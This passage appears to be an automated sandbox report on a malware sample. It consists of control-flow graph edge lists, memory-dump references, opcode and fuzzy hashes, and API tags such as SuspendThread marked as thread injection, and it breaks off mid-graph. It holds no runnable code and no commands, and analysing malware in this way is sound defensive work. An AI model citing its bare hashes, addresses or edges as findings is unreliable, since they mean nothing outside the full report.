                                                    control_flow_graph 662 7ffaacd0194f-7ffaacd01962 663 7ffaacd01964-7ffaacd01ca5 662->663 664 7ffaacd019ae-7ffaacd019c4 662->664 670 7ffaacd01caf-7ffaacd01cee 663->670 666 7ffaacd01a54-7ffaacd01a84 664->666 667 7ffaacd019ca-7ffaacd019d2 664->667 676 7ffaacd01b2e-7ffaacd01b37 666->676 677 7ffaacd01a8a-7ffaacd01a8b 666->677 669 7ffaacd019d8-7ffaacd019ea 667->669 667->670 669->670 671 7ffaacd019f0-7ffaacd01a07 669->671 685 7ffaacd01cf0 670->685 674 7ffaacd01a09-7ffaacd01a10 671->674 675 7ffaacd01a47-7ffaacd01a4e 671->675 674->670 679 7ffaacd01a16-7ffaacd01a44 674->679 675->666 675->667 682 7ffaacd01c6f-7ffaacd01c7d 676->682 683 7ffaacd01b3d-7ffaacd01b43 676->683 680 7ffaacd01a8e-7ffaacd01aa4 677->680 679->675 680->670 684 7ffaacd01aaa-7ffaacd01ace 680->684 686 7ffaacd01c84-7ffaacd01c95 682->686 687 7ffaacd01c7f 682->687 683->670 688 7ffaacd01b49-7ffaacd01b58 683->688 689 7ffaacd01b21-7ffaacd01b28 684->689 690 7ffaacd01ad0-7ffaacd01af3 684->690 694 7ffaacd01cfb-7ffaacd01d91 685->694 687->686 691 7ffaacd01c62-7ffaacd01c69 688->691 692 7ffaacd01b5e-7ffaacd01b65 688->692 689->676 689->680 690->670 699 7ffaacd01af9-7ffaacd01b1f 690->699 691->682 691->683 692->670 693 7ffaacd01b6b-7ffaacd01b75 692->693 697 7ffaacd01b7c-7ffaacd01b87 693->697 700 7ffaacd01d16-7ffaacd01d96 694->700 701 7ffaacd01d9c-7ffaacd01ddf 694->701 702 7ffaacd01b89-7ffaacd01ba0 697->702 703 7ffaacd01bc6-7ffaacd01bd5 697->703 699->689 699->690 700->701 711 7ffaacd01d38-7ffaacd01d98 700->711 714 7ffaacd01de1-7ffaacd01e36 701->714 702->670 705 7ffaacd01ba6-7ffaacd01bc2 702->705 703->670 706 7ffaacd01bdb-7ffaacd01bff 703->706 705->702 707 7ffaacd01bc4 705->707 708 7ffaacd01c02-7ffaacd01c1f 706->708 712 7ffaacd01c42-7ffaacd01c58 707->712 708->670 713 7ffaacd01c25-7ffaacd01c40 708->713 711->701 720 7ffaacd01d5c-7ffaacd01d9a 711->720 712->670 717 7ffaacd01c5a-7ffaacd01c5e 712->717 713->708 713->712 726 7ffaacd01e41-7ffaacd01ee7 714->726 717->691 720->701 725 7ffaacd01d7d-7ffaacd01d90 720->725 738 7ffaacd02017-7ffaacd02034 726->738 739 7ffaacd01eed-7ffaacd02290 726->739 741 7ffaacd02341-7ffaacd0235a 738->741 742 7ffaacd0203a-7ffaacd0203f 738->742 743 7ffaacd02042-7ffaacd02049 742->743 745 7ffaacd01fcc-7ffaacd01fdb 743->745 746 7ffaacd0204b-7ffaacd0204f 743->746 745->738 747 7ffaacd02328-7ffaacd02339 745->747 746->714 748 7ffaacd02055 746->748 747->741 749 7ffaacd020d3-7ffaacd020d6 748->749 750 7ffaacd020d9-7ffaacd020e0 749->750 751 7ffaacd02057-7ffaacd0208c call 7ffaacd01ce0 750->751 752 7ffaacd020e6 750->752 751->741 760 7ffaacd02092-7ffaacd020a2 751->760 753 7ffaacd02156-7ffaacd0215d 752->753 755 7ffaacd020e8-7ffaacd0211a call 7ffaacd01ce0 753->755 756 7ffaacd0215f-7ffaacd021a5 753->756 755->741 763 7ffaacd02120-7ffaacd02148 755->763 771 7ffaacd01f74-7ffaacd01f78 756->771 772 7ffaacd021ab-7ffaacd021b0 756->772 760->714 762 7ffaacd020a8-7ffaacd020c5 760->762 762->741 765 7ffaacd020cb-7ffaacd020d0 762->765 763->741 766 7ffaacd0214e-7ffaacd02153 763->766 765->749 766->753 773 7ffaacd01fca 771->773 774 7ffaacd01f7a-7ffaacd02318 771->774 775 7ffaacd02236-7ffaacd0223a 772->775 773->743 776 7ffaacd021b5-7ffaacd021e4 call 7ffaacd01ce0 775->776 777 7ffaacd02240-7ffaacd02246 775->777 776->741 781 7ffaacd021ea-7ffaacd021fa 776->781 781->726 782 7ffaacd02200-7ffaacd0220f 781->782 782->741 783 7ffaacd02215-7ffaacd02228 782->783 783->750 784 7ffaacd0222e-7ffaacd02233 783->784 784->775
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1634040169.00007FFAACD00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaacd00000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: )rem
                                                    • API String ID: 0-2156003729
                                                    • Opcode ID: 73a5ea6c298a3522299f0d1bab45d0eeca09ec31f43775f29e1ec9062c23b221
                                                    • Instruction ID: e5975fbb4d20addf1919161f7205df267f3c686f4cddfe2a31cb5dcb4e8d7107
                                                    • Opcode Fuzzy Hash: 73a5ea6c298a3522299f0d1bab45d0eeca09ec31f43775f29e1ec9062c23b221
                                                    • Instruction Fuzzy Hash: B4427D70A19619DFEB99CF58C4A06B877A1FF46300F5081BDD45FDB686CA38E885CB84
                                                    Function 00007FFAAC5B0D68 Relevance: .3, Instructions: 273COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1621537600.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaac5b0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 305745b0a80e2c21cadc24b2ec2d33cc0e85236c8d3bcc6f0195a6a6f974ceb1
                                                    • Instruction ID: 87fd21721aabb05548e5eb21fb83129a8975f3aa9595562b5c8d14c66ba2c569
                                                    • Opcode Fuzzy Hash: 305745b0a80e2c21cadc24b2ec2d33cc0e85236c8d3bcc6f0195a6a6f974ceb1
                                                    • Instruction Fuzzy Hash: 04A1AEB1918A8E8FE784EF6CC8557A97FE1EB96300F4081BAE04DD76D2DA785815C780
                                                    Function 00007FFAACD0075B Relevance: 4.0, Strings: 3, Instructions: 253COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1634040169.00007FFAACD00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaacd00000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: )rem$)rem$)rem
                                                    • API String ID: 0-1029889671
                                                    • Opcode ID: 969caa022eb45dfb6211cae5fe4400e66b5c29a5097a4a63977b89efca5b513c
                                                    • Instruction ID: e10f933576bf5dd67ff656eaf0d51dab6e2ffef7f8b5f87de5276ce3b6478788
                                                    • Opcode Fuzzy Hash: 969caa022eb45dfb6211cae5fe4400e66b5c29a5097a4a63977b89efca5b513c
                                                    • Instruction Fuzzy Hash: 1971E531A1DA46AFF3A8AB2C9451579B7E0FF86311B14853ED09FC3192DE28F44A87D1
                                                    Function 00007FFAACD0AA2B Relevance: 3.0, Strings: 2, Instructions: 452COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1634040169.00007FFAACD00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaacd00000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: )rem$)rem
                                                    • API String ID: 0-3729628724
                                                    • Opcode ID: ca2fdad4d0250cb27b1e4814806da7f2b8482628ab1668318b28c3f53a4c57ff
                                                    • Instruction ID: 76db5b0b3beddfc35e63acf532422d01e441b289e20e54777da266e8d6c83453
                                                    • Opcode Fuzzy Hash: ca2fdad4d0250cb27b1e4814806da7f2b8482628ab1668318b28c3f53a4c57ff
                                                    • Instruction Fuzzy Hash: 87E12E70A19A8D8FEBB8EF18C855BE937E1FB59301F00812AD84EDB651DF749584CB81
                                                    Function 00007FFAACD02991 Relevance: 2.9, Strings: 2, Instructions: 399COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 250 7ffaacd02991 251 7ffaacd02996-7ffaacd0299e 250->251 252 7ffaacd029a4-7ffaacd029b6 call 7ffaacd02360 251->252 253 7ffaacd02b21-7ffaacd02b35 251->253 258 7ffaacd029b8-7ffaacd029bd 252->258 259 7ffaacd02985-7ffaacd0298c 252->259 255 7ffaacd02b37 253->255 256 7ffaacd02b3c-7ffaacd02b47 253->256 255->256 261 7ffaacd029df-7ffaacd029f0 258->261 262 7ffaacd029bf-7ffaacd029c3 258->262 260 7ffaacd02b60-7ffaacd02b65 259->260 260->250 263 7ffaacd029f6-7ffaacd02a0b 261->263 264 7ffaacd02b6a-7ffaacd02b8d 261->264 265 7ffaacd029c9-7ffaacd029da 262->265 266 7ffaacd02ac3-7ffaacd02ad4 262->266 263->264 267 7ffaacd02a11-7ffaacd02a1d 263->267 274 7ffaacd02b91-7ffaacd02bf3 264->274 275 7ffaacd02b8f 264->275 265->253 268 7ffaacd02ad6 266->268 269 7ffaacd02adb-7ffaacd02ae6 266->269 270 7ffaacd02a1f-7ffaacd02a36 call 7ffaacd00e70 267->270 271 7ffaacd02a4e-7ffaacd02a64 call 7ffaacd02360 267->271 268->269 270->266 281 7ffaacd02a3c-7ffaacd02a4b call 7ffaacd00fa0 270->281 271->266 283 7ffaacd02a66-7ffaacd02a71 271->283 297 7ffaacd02bfe-7ffaacd02c1c 274->297 298 7ffaacd02bbb-7ffaacd02bf7 274->298 275->274 278 7ffaacd02bd1-7ffaacd02bd3 275->278 284 7ffaacd02bd5-7ffaacd02bf0 278->284 285 7ffaacd02c1e-7ffaacd02c50 278->285 281->271 283->264 287 7ffaacd02a77-7ffaacd02a8c 283->287 299 7ffaacd02d38-7ffaacd02d3d 285->299 287->264 292 7ffaacd02a92-7ffaacd02aa5 287->292 295 7ffaacd02af9-7ffaacd02b01 292->295 296 7ffaacd02aa7-7ffaacd02ac1 call 7ffaacd00e70 292->296 304 7ffaacd02b09-7ffaacd02b0c 295->304 296->266 306 7ffaacd02ae7-7ffaacd02af6 call 7ffaacd00fa0 296->306 298->278 319 7ffaacd02d51-7ffaacd02d6f 299->319 320 7ffaacd02c6c-7ffaacd02d47 299->320 308 7ffaacd02b13-7ffaacd02b1b 304->308 306->295 308->253 314 7ffaacd0295a-7ffaacd02967 308->314 314->308 316 7ffaacd0296d-7ffaacd02981 314->316 316->308 328 7ffaacd02c96-7ffaacd02c99 320->328 329 7ffaacd02d1d-7ffaacd02d35 320->329 328->329 330 7ffaacd02c9f-7ffaacd02ca2 328->330 329->299 332 7ffaacd02ca4-7ffaacd02cd1 330->332 333 7ffaacd02d0b-7ffaacd02d12 330->333 334 7ffaacd02d14-7ffaacd02d1c 333->334 335 7ffaacd02cd2-7ffaacd02cec 333->335 337 7ffaacd02cf2-7ffaacd02cfd 335->337 338 7ffaacd02d71-7ffaacd02d9a 335->338 337->338 339 7ffaacd02cff-7ffaacd02d09 337->339 339->333
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1634040169.00007FFAACD00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaacd00000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: )rem$)rem
                                                    • API String ID: 0-3729628724
                                                    • Opcode ID: f058c18538e869f0778e9ccdc7b5df3e9725439341490ff4f8176af0f0f04f6f
                                                    • Instruction ID: 6fa8e36251cc675b82c51a4f2976243be848cdeb11ccb5d39aa77400706821b7
                                                    • Opcode Fuzzy Hash: f058c18538e869f0778e9ccdc7b5df3e9725439341490ff4f8176af0f0f04f6f
                                                    • Instruction Fuzzy Hash: 43D1E030A1FA069FE3A9CB28D49157577E1FF46300B1085BEC49FC7686DE29F84A8781
                                                    Function 00007FFAACD01202 Relevance: 2.8, Strings: 2, Instructions: 328COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 343 7ffaacd01202-7ffaacd01209 344 7ffaacd01425-7ffaacd01436 343->344 345 7ffaacd0120f-7ffaacd01241 call 7ffaacd00fa0 call 7ffaacd00e70 343->345 347 7ffaacd01438 344->347 348 7ffaacd0143d-7ffaacd01448 344->348 345->344 352 7ffaacd01247-7ffaacd01299 call 7ffaacd00fa0 call 7ffaacd00e70 345->352 347->348 352->344 359 7ffaacd0129f-7ffaacd012e4 call 7ffaacd00fa0 352->359 365 7ffaacd012e6-7ffaacd012fa call 7ffaacd00e70 359->365 366 7ffaacd01354-7ffaacd01390 359->366 365->344 370 7ffaacd01300-7ffaacd01323 call 7ffaacd00fa0 365->370 375 7ffaacd013c9-7ffaacd013ce 366->375 376 7ffaacd01329-7ffaacd01339 370->376 377 7ffaacd014f5-7ffaacd0150c 370->377 380 7ffaacd013d5-7ffaacd013da 375->380 376->377 378 7ffaacd0133f-7ffaacd01352 376->378 381 7ffaacd0150f-7ffaacd0151d 377->381 382 7ffaacd0150e 377->382 378->365 378->366 383 7ffaacd01392-7ffaacd013b2 380->383 384 7ffaacd013dc-7ffaacd013de 380->384 386 7ffaacd01525 381->386 387 7ffaacd0151f 381->387 382->381 383->377 385 7ffaacd013b8-7ffaacd013c3 383->385 384->344 388 7ffaacd013e0-7ffaacd013e3 384->388 385->375 389 7ffaacd014ab-7ffaacd014bf 385->389 390 7ffaacd01529-7ffaacd01568 386->390 391 7ffaacd01527 386->391 387->386 392 7ffaacd013e9-7ffaacd01404 388->392 393 7ffaacd013e5 388->393 396 7ffaacd014c6-7ffaacd014d1 389->396 397 7ffaacd014c1 389->397 394 7ffaacd01569 390->394 399 7ffaacd0156a-7ffaacd017aa 390->399 391->390 391->394 392->377 398 7ffaacd0140a-7ffaacd01423 call 7ffaacd00e70 392->398 393->392 394->399 397->396 398->344 403 7ffaacd01449-7ffaacd01462 call 7ffaacd00fa0 398->403 403->377 407 7ffaacd01468-7ffaacd0146f 403->407 408 7ffaacd01499-7ffaacd014a1 407->408 409 7ffaacd014a3-7ffaacd014a9 408->409 410 7ffaacd01471-7ffaacd0148d 408->410 409->389 412 7ffaacd014d2 409->412 410->377 411 7ffaacd0148f-7ffaacd01497 410->411 411->408 412->377
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1634040169.00007FFAACD00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaacd00000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: )rem$)rem
                                                    • API String ID: 0-3729628724
                                                    • Opcode ID: f016a6345b5aa5715245c6df1a0a530751da2cec40bfde9122ad19b71d0af6dd
                                                    • Instruction ID: c72d4f261ddf2a2605d74cc6c7ab15429a6d2a5ff841948770e776eae934fed1
                                                    • Opcode Fuzzy Hash: f016a6345b5aa5715245c6df1a0a530751da2cec40bfde9122ad19b71d0af6dd
                                                    • Instruction Fuzzy Hash: ABC1A370A19A46EFE789DB68C0906A4B7E1FF46300F54817DD05FCBA96CB28F85587C1
                                                    Function 00007FFAACD00D60 Relevance: 2.6, Strings: 2, Instructions: 63COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 413 7ffaacd00d60-7ffaacd00d6f 415 7ffaacd00d71-7ffaacd00da3 413->415 416 7ffaacd00daf-7ffaacd00dbf 413->416 423 7ffaacd00daa-7ffaacd00e03 415->423 417 7ffaacd00dc6-7ffaacd00dcf 416->417 418 7ffaacd00dc1 416->418 418->417 425 7ffaacd00e05 423->425 426 7ffaacd00e0a-7ffaacd00e13 423->426 425->426
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1634040169.00007FFAACD00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaacd00000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: )rem$)rem
                                                    • API String ID: 0-3729628724
                                                    • Opcode ID: f2c8a7480507fa04e08bbfbb559d9bc0c08dd849040fac584446395467ed1b87
                                                    • Instruction ID: 02a74c9bc5d8c69b444f844b0abc2570ae0f2aea55195466d835daf05f8b8863
                                                    • Opcode Fuzzy Hash: f2c8a7480507fa04e08bbfbb559d9bc0c08dd849040fac584446395467ed1b87
                                                    • Instruction Fuzzy Hash: 2511C131A1990A9FEB94EB28D4009F973A0EF56351F40853AE04FC7892CE28F84987A1
                                                    Function 00007FFAACD00BDE Relevance: 2.6, Strings: 2, Instructions: 59COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 427 7ffaacd00bde-7ffaacd00be2 428 7ffaacd00be8-7ffaacd00bec 427->428 429 7ffaacd00daf-7ffaacd00dbf 427->429 432 7ffaacd00bf6-7ffaacd00bfa 428->432 430 7ffaacd00dc6-7ffaacd00dcf 429->430 431 7ffaacd00dc1 429->431 431->430 433 7ffaacd00c00-7ffaacd00c09 432->433 434 7ffaacd00bfc 432->434 435 7ffaacd00d26-7ffaacd00d39 433->435 436 7ffaacd00c0f-7ffaacd00c23 433->436 434->433 437 7ffaacd00d40-7ffaacd00d49 435->437 438 7ffaacd00d3b 435->438 436->435 438->437
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1634040169.00007FFAACD00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaacd00000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: )rem$)rem
                                                    • API String ID: 0-3729628724
                                                    • Opcode ID: 45366e7e3012429f1c552dfd06dcc0d0394c1573c96acba8dd977534d8328171
                                                    • Instruction ID: c200b56d4685522502111da55d2b8cbc9281ea31663ea4c63c5965abfdd1f647
                                                    • Opcode Fuzzy Hash: 45366e7e3012429f1c552dfd06dcc0d0394c1573c96acba8dd977534d8328171
                                                    • Instruction Fuzzy Hash: D2114431A0A50B9FF7449F18D4006E933A0EF56361F10813AE81FCB6C1CA29F894C7A1
                                                    Function 00007FFAACD03598 Relevance: 2.0, Instructions: 1958COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 439 7ffaacd03598-7ffaacd03763 454 7ffaacd03769-7ffaacd037f3 439->454 455 7ffaacd04d8a-7ffaacd04da8 call 7ffaacd04f2d call 7ffaacd04f7d 439->455 467 7ffaacd037f5-7ffaacd03828 454->467 468 7ffaacd0382d-7ffaacd0390c 454->468 471 7ffaacd03912-7ffaacd039ad 467->471 468->471 483 7ffaacd039e7-7ffaacd03ac6 471->483 484 7ffaacd039af-7ffaacd039e2 471->484 487 7ffaacd03acc-7ffaacd03b67 483->487 484->487 499 7ffaacd03b69-7ffaacd03b6e 487->499 500 7ffaacd03b73-7ffaacd03c18 487->500 501 7ffaacd03c1c-7ffaacd03caf 499->501 500->501 511 7ffaacd03cb1-7ffaacd03cb6 501->511 512 7ffaacd03cbb-7ffaacd03d61 501->512 513 7ffaacd03d64-7ffaacd03df7 511->513 512->513 523 7ffaacd03df9-7ffaacd03e2c 513->523 524 7ffaacd03e31-7ffaacd03f10 513->524 527 7ffaacd03f16-7ffaacd03fb1 523->527 524->527 539 7ffaacd03fb3-7ffaacd03fe6 527->539 540 7ffaacd03feb-7ffaacd0415b 527->540 543 7ffaacd04161-7ffaacd041fc 539->543 540->543 556 7ffaacd04236-7ffaacd043a6 543->556 557 7ffaacd041fe-7ffaacd04231 543->557 562 7ffaacd043ac-7ffaacd04447 556->562 557->562 576 7ffaacd04449-7ffaacd0447c 562->576 577 7ffaacd04481-7ffaacd04560 562->577 582 7ffaacd04566-7ffaacd04601 576->582 577->582 595 7ffaacd04603-7ffaacd04636 582->595 596 7ffaacd0463b-7ffaacd0471a 582->596 599 7ffaacd04720-7ffaacd047bb 595->599 596->599 611 7ffaacd047f5-7ffaacd04965 599->611 612 7ffaacd047bd-7ffaacd047f0 599->612 615 7ffaacd0496b-7ffaacd04a06 611->615 612->615 627 7ffaacd04a08-7ffaacd04a3b 615->627 628 7ffaacd04a40-7ffaacd04bb0 615->628 633 7ffaacd04bb6-7ffaacd04c51 627->633 628->633 648 7ffaacd04c53-7ffaacd04c58 633->648 649 7ffaacd04c5d-7ffaacd04d7e 633->649 650 7ffaacd04d81-7ffaacd04d84 648->650 649->650 650->455
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1634040169.00007FFAACD00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaacd00000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f32986a256e0aff0e0d3947b4d3f2a5df0f9f5164c590ebeeede6352cf18af70
                                                    • Instruction ID: 257f972b84e4eb8d4923e64c8e513279a13ac37d0e90804684bbb9714a4fe06f
                                                    • Opcode Fuzzy Hash: f32986a256e0aff0e0d3947b4d3f2a5df0f9f5164c590ebeeede6352cf18af70
                                                    • Instruction Fuzzy Hash: 8CF27470A1891D8FDF99EB18C894FA9B7B1FB69305F1041E9900EE7691DE31AE85CF40
                                                    Function 00007FFAAC760040 Relevance: 1.7, APIs: 1, Instructions: 162threadCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 785 7ffaac760040-7ffaac760079 786 7ffaac76007b 785->786 787 7ffaac76007c-7ffaac760152 ResumeThread 785->787 786->787 790 7ffaac76015a-7ffaac7601a4 787->790 791 7ffaac760154 787->791 791->790
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1624746487.00007FFAAC750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC750000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaac750000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID: ResumeThread
                                                    • String ID:
                                                    • API String ID: 947044025-0
                                                    • Opcode ID: 3fedfce642cab65482ed866e1a15812c967ab155343e81b41eebf6257546618b
                                                    • Instruction ID: 22efc98a94efc8c7f5db75d4306a0577fd52c57d2764efc44153a9850b727caa
                                                    • Opcode Fuzzy Hash: 3fedfce642cab65482ed866e1a15812c967ab155343e81b41eebf6257546618b
                                                    • Instruction Fuzzy Hash: 1F517B7090878C8FDB5ADFA8D855AE9BFB0EF56310F0481AFD049DB292CA349846CB51
                                                    Function 00007FFAAC75E84D Relevance: 1.6, APIs: 1, Instructions: 139threadinjectionCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 794 7ffaac75e84d-7ffaac75e859 795 7ffaac75e85b-7ffaac75e863 794->795 796 7ffaac75e864-7ffaac75e932 SuspendThread 794->796 795->796 800 7ffaac75e93a-7ffaac75e984 796->800 801 7ffaac75e934 796->801 801->800
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1624746487.00007FFAAC750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC750000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaac750000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID: SuspendThread
                                                    • String ID:
                                                    • API String ID: 3178671153-0
                                                    • Opcode ID: 9628fb853806b2e8f894f9ba1a5b532791a45eff33c428f0113c56ccee473631
                                                    • Instruction ID: 132fa55085975b158b93869373f854514b4e946b9b9aa40903120bca1c33ac88
                                                    • Opcode Fuzzy Hash: 9628fb853806b2e8f894f9ba1a5b532791a45eff33c428f0113c56ccee473631
                                                    • Instruction Fuzzy Hash: F7412A70D0864D8FDB98DFA8D885BEDBBF0FB5A310F10416AD049E7292DA74A845CF41
                                                    Function 00007FFAAC761E35 Relevance: 1.6, APIs: 1, Instructions: 133COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 804 7ffaac761e35-7ffaac761f13 GetFileAttributesW 807 7ffaac761f1b-7ffaac761f59 804->807 808 7ffaac761f15 804->808 808->807
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1624746487.00007FFAAC750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC750000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaac750000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID: AttributesFile
                                                    • String ID:
                                                    • API String ID: 3188754299-0
                                                    • Opcode ID: 62c192db2082d2ae36dc0a5208f1d3410eedd09807d84cdf85f89591defd4d1b
                                                    • Instruction ID: b7212d95cb52aedf5207937404db9a33d1fe5760b71d943b122230f819065f5b
                                                    • Opcode Fuzzy Hash: 62c192db2082d2ae36dc0a5208f1d3410eedd09807d84cdf85f89591defd4d1b
                                                    • Instruction Fuzzy Hash: 0641F970D0864C8FDB98DF98D885BEDBBF0FB5A310F10816AD009E7252DA709845CF41
                                                    Function 00007FFAACD0196F Relevance: 1.6, Strings: 1, Instructions: 334COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 810 7ffaacd0196f-7ffaacd01978 811 7ffaacd01caf-7ffaacd01cf0 810->811 812 7ffaacd0197e-7ffaacd0198f 810->812 834 7ffaacd01cfb-7ffaacd01d91 811->834 813 7ffaacd019a5-7ffaacd019ac 812->813 814 7ffaacd01991-7ffaacd01995 812->814 817 7ffaacd01964-7ffaacd01ca5 813->817 818 7ffaacd019ae-7ffaacd019c4 813->818 814->811 816 7ffaacd0199b-7ffaacd019a3 814->816 816->813 817->811 821 7ffaacd01a54-7ffaacd01a84 818->821 822 7ffaacd019ca-7ffaacd019d2 818->822 831 7ffaacd01b2e-7ffaacd01b37 821->831 832 7ffaacd01a8a-7ffaacd01a8b 821->832 822->811 825 7ffaacd019d8-7ffaacd019ea 822->825 825->811 827 7ffaacd019f0-7ffaacd01a07 825->827 829 7ffaacd01a09-7ffaacd01a10 827->829 830 7ffaacd01a47-7ffaacd01a4e 827->830 829->811 833 7ffaacd01a16-7ffaacd01a44 829->833 830->821 830->822 837 7ffaacd01c6f-7ffaacd01c7d 831->837 838 7ffaacd01b3d-7ffaacd01b43 831->838 836 7ffaacd01a8e-7ffaacd01aa4 832->836 833->830 844 7ffaacd01d16-7ffaacd01d96 834->844 845 7ffaacd01d9c-7ffaacd01ddf 834->845 836->811 839 7ffaacd01aaa-7ffaacd01ace 836->839 841 7ffaacd01c84-7ffaacd01c95 837->841 842 7ffaacd01c7f 837->842 838->811 843 7ffaacd01b49-7ffaacd01b58 838->843 846 7ffaacd01b21-7ffaacd01b28 839->846 847 7ffaacd01ad0-7ffaacd01af3 839->847 842->841 848 7ffaacd01c62-7ffaacd01c69 843->848 849 7ffaacd01b5e-7ffaacd01b65 843->849 844->845 856 7ffaacd01d38-7ffaacd01d98 844->856 858 7ffaacd01de1-7ffaacd01e36 845->858 846->831 846->836 847->811 857 7ffaacd01af9-7ffaacd01b1f 847->857 848->837 848->838 849->811 850 7ffaacd01b6b-7ffaacd01b75 849->850 855 7ffaacd01b7c-7ffaacd01b87 850->855 860 7ffaacd01b89-7ffaacd01ba0 855->860 861 7ffaacd01bc6-7ffaacd01bd5 855->861 856->845 868 7ffaacd01d5c-7ffaacd01d9a 856->868 857->846 857->847 878 7ffaacd01e41-7ffaacd01ee7 858->878 860->811 863 7ffaacd01ba6-7ffaacd01bc2 860->863 861->811 864 7ffaacd01bdb-7ffaacd01bff 861->864 863->860 867 7ffaacd01bc4 863->867 869 7ffaacd01c02-7ffaacd01c1f 864->869 871 7ffaacd01c42-7ffaacd01c58 867->871 868->845 877 7ffaacd01d7d-7ffaacd01d90 868->877 869->811 873 7ffaacd01c25-7ffaacd01c40 869->873 871->811 874 7ffaacd01c5a-7ffaacd01c5e 871->874 873->869 873->871 874->848 890 7ffaacd02017-7ffaacd02034 878->890 891 7ffaacd01eed-7ffaacd02290 878->891 893 7ffaacd02341-7ffaacd0235a 890->893 894 7ffaacd0203a-7ffaacd0203f 890->894 895 7ffaacd02042-7ffaacd02049 894->895 897 7ffaacd01fcc-7ffaacd01fdb 895->897 898 7ffaacd0204b-7ffaacd0204f 895->898 897->890 899 